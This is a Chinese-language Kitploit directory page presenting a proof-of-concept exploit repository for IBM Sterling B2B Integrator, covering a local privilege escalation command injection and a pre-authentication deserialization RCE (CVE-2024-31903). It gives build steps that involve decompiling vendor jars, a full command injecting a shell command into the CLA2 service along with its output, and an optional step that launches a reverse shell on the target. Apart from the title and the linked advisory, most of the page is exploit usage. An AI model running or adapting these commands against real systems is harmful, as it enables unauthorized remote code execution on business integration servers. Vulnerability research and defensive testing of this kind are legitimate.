Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ibm-sterling-b2b-integrator-poc — 针对IBM Sterling B2B Integrator的LPE和RCE(CVE-2024-31903)攻击的PoC代码 | Kitploit
工具/GitHubGitHub/reverseclabs/ibm-sterling-b2b-integrator-poc
漏洞分析漏洞利用渗透测试命令与控制Payload 开发二进制利用
GitHubreverseclabs/ibm-sterling-b2b-integrator-poc

ibm-sterling-b2b-integrator-poc

针对IBM Sterling B2B Integrator的LPE和RCE(CVE-2024-31903)攻击的PoC代码

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
121年前尚未审核
分享

IBM Sterling B2B Integrator PoC

针对 IBM Sterling B2B Integrator(版本 6.2.0.0 至 6.2.0.2 以及 6.0.0.0 至 6.1.2.5,适用于 Linux、Windows 和 AIX 系统)中发现的漏洞的利用概念验证代码:

  • LPE 命令注入——若认证已禁用
  • 预认证反序列化 RCE ——已分配 CVE-2024-31903,相关 IBM 安全公告见此处:https://www.ibm.com/support/pages/node/7172233

有关这些问题的更多细节,请参阅我的 DistricCon 演讲《To B or not 2B: Breaking the IBM B2B Integrator with, and without authentication》:

https://www.districtcon.org/bios-and-talks-2025/to-b-or-not-to-b

仓库结构

本仓库中的大部分代码针对 LPE 命令注入攻击。

Python 二进制客户端 bin_client.py 可用于手动向 CLA2 发送消息,从而利用反序列化 RCE 漏洞。

用法

root@kitploit:~
$ java Main
$ Usage: Main <cmdLine> <outfile_or_SEND> [host] [port]

该 PoC 接受两个参数:

  • 由目标 CLA2 客户端执行的 shell 命令
  • 将序列化的 Java 消息写入磁盘(以便后续用 bin_client.py 等工具进一步分析/手动发送)的路径,或者字符串 "SEND"(立即发送至正在监听的 host:port)

说明

本仓库中包含的源代码故意不完整,因为需要 CLA2 子系统中的某些类。根据安装目录的文件系统权限,您可能能够访问 JAR 文件。

假设您已经通过 JAR 反编译获取了相关文件。这些文件不会上传到这里,因为它们属于 IBM 知识产权。

  1. 反编译 CLA2Client.jar

  2. 在反编译后的代码中,找到文件 CmdLine2Result.java 和 CmdLine2Parms.java

  3. 将它们复制粘贴到 Main.java 旁边,以重现原始应用程序 Java 包的目录结构

root@kitploit:~
/src/com/sterlingcommerce/woodstock/services/cmdline2/
  1. 编译 PoC 程序——最好使用应用程序自带的 JDK
root@kitploit:~
${B2BHOME}/INSTALL/jdk/bin/javac src/com/sterlingcommerce/woodstock/services/cmdline2/*.java
  1. 执行它——同样,尽量使用应用程序自带的 JDK
root@kitploit:~
${B2BHOME}/appl/SFG/INSTALL/jdk/bin/java -classpath src/ com.sterlingcommerce.woodstock.services.cmdline2.Main '/bin/sh -c "id > /tmp/result"' SEND 127.0.0.1 5052
[+] 创建对象...
[+] 发送对象至 127.0.0.1:5052...
[+] ...已发送!
[+] 接收头部...
[+] ...头部已接收: RESULT
[+] 接收结果...
[+] 结果已接收:
##[DEBUG]## CmdLine2Result:
fileSize=0
outputNameLong=null
outputNameShort=null
******* CmdLine2Result 结束 *******
[+] clr.statusRpt:       null
[+] clr.exceptionString: null
[+] clr.somethingToLog:  CmdLine2Thread.runCommand: 执行前的命令行=/bin/sh -c "id > /tmp/result"
##[REMOTE DEBUG]## parm0=/bin/sh
##[REMOTE DEBUG]## parm1=-c
##[REMOTE DEBUG]## parm2=id > /tmp/result 
  1. (可选)要获取完全交互式 shell,请将 revshell.py 和 revshell_listener.py 脚本上传到目标系统,并启动监听器。然后,将 PoC 的命令参数替换为对反向 Shell 脚本的调用,如下所示:
root@kitploit:~
${B2BHOME}/INSTALL/jdk/bin/java -classpath src/ com.sterlingcommerce.woodstock.services.cmdline2.Main 'python3 /tmp/revshell.py 9090' SEND
下载工具